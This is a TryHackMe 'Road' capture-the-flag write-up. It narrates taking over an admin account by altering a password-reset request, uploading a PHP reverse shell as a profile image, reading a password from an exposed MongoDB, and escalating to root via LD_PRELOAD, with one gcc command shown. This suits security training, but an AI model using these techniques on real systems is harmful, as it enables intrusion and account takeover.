Road - TryHackMe
Recon and User Flag
First, we do a nmap scan to discover that port 22 and 80 are open.
Visiting the website, there is a “Merchant Central” button that led us to an admin login page.
We can register our user.
After the login, we see just a normal dashboard.
In the “ResetUser” option, we see that we can alter our user password.
But what if we can alter the request to another user?
Now we need to discover another username to change it password.
Looking at the profile configurations, there is a change profile image function that only admins can access, and there is a possible username for the admin: admin@sky.thm.
Let’s modify the change password request to this username.
Apparently, it worked!
Now we just login with the new password and get permission to update profile images, so we can upload a PHP reverse shell here.
But now we need to find where this file is stored.
Looking at the source code of this profile page, we find a comment reveling where the profile images are stored.
Direct access is not permitted in this directory, so we need to access the file in http://10.10.28.242/v2/profileimages/php-reverse-shell.php.
Now we get the reverse shell and cat the user.txt file.
Webdeveloper Access
Doing some port enumeration, we see that there is an open port number 27017. This is the port of mongo database.
Accessing mongo, in the database "backup" and collection "user", we found the webdeveloper password.
With this, we have SSH access.
Root Flag
Doing further enumeration, we see that we can use /usr/bin/sky_backup_utility with LD_PRELOAD set environment permission with the root user. With that we can execute the command with our own libraries and escalate our privileges.
First, we create a C file to compile our library.
Then we compile it, execute the /usr/bin/sky_backup_utility with our library and get the root flag.
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
See ya =)
